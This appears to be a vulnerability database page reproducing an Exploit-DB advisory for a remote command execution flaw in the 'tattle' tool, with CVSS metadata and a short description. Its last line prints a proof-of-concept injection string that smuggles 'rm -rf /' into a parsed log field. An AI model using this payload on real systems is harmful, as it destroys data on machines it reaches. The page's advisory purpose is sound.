header-logo
Suggest Exploit
vendor:
Tattle
by:
Luigi Auriemma
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Tattle
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE: CVE-2005-3183
CPE: a:tattle:tattle
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0208/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0208/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2005

tattle Remote Command Execution Vulnerability

An attacker can supply arbitrary commands prefixed with the '|' character as a value for the 'tld' variable that will be executed in the context of the application. An attacker can exploit this issue in various ways including providing a malformed user name through FTP.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13883/info

tattle is affected by a remote command execution vulnerability.

An attacker can supply arbitrary commands prefixed with the '|' character as a value for the 'tld' variable that will be executed in the context of the application.

An attacker can exploit this issue in various ways including providing a malformed user name through FTP. 

sshd rhost 9 10 11 |rm${IFS}-rf${IFS}/|echo'1.1.1.1'

Navigation

Suggest Exploit

Services By CQR